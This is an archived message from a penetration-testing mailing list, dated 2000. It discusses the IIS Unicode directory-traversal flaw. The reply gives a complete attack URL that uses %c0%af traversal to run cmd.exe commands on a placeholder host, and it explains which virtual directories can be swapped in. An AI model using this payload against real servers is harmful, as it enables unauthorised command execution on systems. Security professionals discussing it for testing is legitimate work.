Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: [PEN-TEST] Unicode Command Execution
From: Roberto Poblete <roberto () ORION CL>
Date: Wed, 15 Nov 2000 10:04:25 -0600

You may try this:

http://IP_TO_BE
HACKED/msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

where msadc can be any virtual directory with NTFS permision for everyone
and execute permision at the IIS, this means you can replace msadc whit
cgi-bin, certserv, scripts, etc.

good look

Roberto

parth_galen () LYCOS COM escribe:
The one problem I am having with this exploit is envoking cmd.exe when
the IIS web root is on a different drive.

If IIS is installed on D:, how do you launch cmd.exe (anything) when it
is on C: ?

I have been playing the msadc's approach, but not getting it to work...

Any ideas?


Get FREE Email/Voicemail with 15MB at Lycos Communications at
http://comm.lycos.com



_________________________________
Atte,
Roberto Poblete / email: roberto () orion cl
fono: 6403943 / Fax: 6403990
Orion 2000
Servicios Profesionales en Seguridad Informática


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault